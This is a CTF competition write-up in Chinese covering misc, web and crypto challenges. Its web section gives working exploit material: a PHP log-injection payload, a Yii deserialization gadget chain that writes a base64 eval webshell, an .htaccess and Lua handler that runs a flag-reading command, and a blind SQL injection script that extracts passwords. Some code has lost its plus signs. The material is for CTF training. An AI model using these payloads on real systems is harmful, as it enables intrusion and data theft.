Misc
签到
附件(提取码:zlxu)
EBCDIC解码得到flag
colorful code
附件(提取码:h3w8)
data2三个一组转RGB,然后data1里的数字就是对应的RGB的位置,然后根据data1的字符数量分解质因数得到宽高,最后画图去npiet解
附上脚本:
代码语言:javascript复制from PIL import Image
import matplotlib.pyplot as plt
f1 = open('data1')
c1 = f1.read()
c1 = c1.split(' ')
print(c1)
print(len(c1))
f = open('data2','rb')
c = f.read()
res = []
for i in range(len(c)//3):
yyy = c[i*3:i*3 3]
r,g,b = yyy[0],yyy[1],yyy[2]
res.append((r,g,b))
print(len(res))
print(res)
rr = []
for i in c1[:-1]:
rr.append(res[int(i)])
print(rr)
a = 191
b = 37
img = Image.new('RGB',(b,a),(255,255,255))
for j in range(b):
for i in range(a):
img.putpixel((j,i),rr[i j*a])
plt.imshow(img)
img.save('flag.png')Web
find_it
发送个get请求(//?code=<?=phpinfo();?>),然后访问hack.php即可得到flag
framework
反序列化
代码语言:javascript复制<?php
namespace yiirest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("php://filter/write=convert.base64-decode/resource=/var/www/html/web/assets/5118a5d1/fonts/b.php","PD9waHAgZXZhbCgkX0dFVFthXSk7Pz4K")';
$this->modelClass='DynamicModel';
$this->scenario='111';
}
}
}
namespace Faker{
use yiirestCreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
namespace yiidb{
use FakerGenerator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yiidbBatchQueryResult));
}
?>
#http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/index.php?r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6NDp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjE1MToiZmlsZV9wdXRfY29udGVudHMoInBocDovL2ZpbHRlci93cml0ZT1jb252ZXJ0LmJhc2U2NC1kZWNvZGUvcmVzb3VyY2U9L3Zhci93d3cvaHRtbC93ZWIvYXNzZXRzLzUxMThhNWQxL2ZvbnRzL2IucGhwIiwiUEQ5d2FIQWdaWFpoYkNna1gwZEZWRnRoWFNrN1B6NEsiKSI7czoxMDoibW9kZWxDbGFzcyI7czoxMjoiRHluYW1pY01vZGVsIjtzOjg6InNjZW5hcmlvIjtzOjM6IjExMSI7fWk6MTtzOjM6InJ1biI7fX19fQ==接着构造payload:
代码语言:javascript复制http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/assets/5118a5d1/fonts/harvey.php?a=eval($_POST[harvey]); 然后蚁剑成功连接,发现ua绕过保护执行命令,参考西湖论剑_web1.docx;
于是我们分别上传 .htaccess 和 3.lua 这两个文件
代码语言:javascript复制AddHandler lua-script .luarequire "string"
--[[
This is the default method name for Lua handlers, see the optional
function-name in the LuaMapHandler directive to choose a different
entry point.
--]]
function handle(r)
r.content_type = "text/plain"
r:puts("Hello Lua World!n")
local t = io.popen('/readflag')
local a = t:read("*all")
r:puts(a)
if r.method == 'GET' then
for k, v in pairs( r:parseargs() ) do
r:puts( string.format("%s: %sn", k, v) )
end
else
r:puts("Unsupported HTTP method " .. r.method)
end
end最后去访问 3.lua 即可得到flag
WebsiteManger
sql盲注
代码语言:javascript复制import requests
url='http://eci-2zeg1tmyhxfbqrmxi9m1.cloudeci1.ichunqiu.com/image.php?id=3'
payload='^((ascii(substr((select(group_concat(password))from(users)),{},1)))={})'
s='1234567890abcdef'
for i in range(1,30):
for b in s:
payloads=payload.format(i,ord(b))
a=requests.get(url payloads)
#print(url payloads)
if len(a.text)<19000:
print(b)
break
else:
pass跑下脚本得到密码:dd6005ef9c77d5ae820ba;进而成功登录
然后ssrf,file:///flag得到flag
Crypto(原题)
primegame
附件(提取码:rlgc)
源自Baby Bubmi的wp:http://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/
附上脚本:
代码语言:javascript复制import math
from decimal import *
import random
import struct
getcontext().prec = int(100)
primes = [2]
for i in range(3, 100):
f = True
for j in primes:
if i * i < j:
break
if i % j == 0:
f = False
break
if f:
primes.append(i)
keys = []
for i in range(len(primes)):
keys.append(Decimal(int(primes[i])).ln())
arr = []
for v in keys:
arr.append(int(v * int(16) ** int(64)))
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453
def encrypt(res):
h = Decimal(int(0))
for i in range(len(keys)):
h = res[i] * keys[i]
ct = int(h * int(16)**int(64))
return ct
def f(N):
ln = len(arr)
A = Matrix(ZZ, ln 1, ln 1)
for i in range(ln):
A[i, i] = 1
A[i, ln] = arr[i] // N
A[ln, i] = 64
A[ln, ln] = ct // N
res = A.LLL()
for i in range(ln 1):
flag = True
for j in range(ln):
if -64 <= res[i][j] < 64:
continue
flag = False
break
if flag:
vec = [int(v 64) for v in res[i][:-1]]
ret = encrypt(vec)
if ret == ct:
print(N, bytes(vec))
else:
print("NO", ret, bytes(vec))
for i in range(2, 10000):
print(i)
f(i)hpcurve
附件(提取码:97js)
源自 hxpCTF2020 的 hyper 的官方wp:https://jsur.in/posts/2020-12-21-hxp-ctf-2020-hyper-writeup
附上脚本:
代码语言:javascript复制import itertools
import struct
p = 10000000000000001119
R.<x> = GF(p)[]; y=x
f = y prod(map(eval, 'yyyyyyy'))
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
known_pt = b"a"*20 b"flag"
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
blocks = [rng_output[i:i 8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 ui[2]*x^2 ui[1]*x ui[0]
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]
for rs in itertools.product(*vi):
q = struct.pack('<' 'Q'*len(rs), *rs)
flag = bytes(k^^m for k,m in zip(2*(rng_output q), enc))
print(flag)
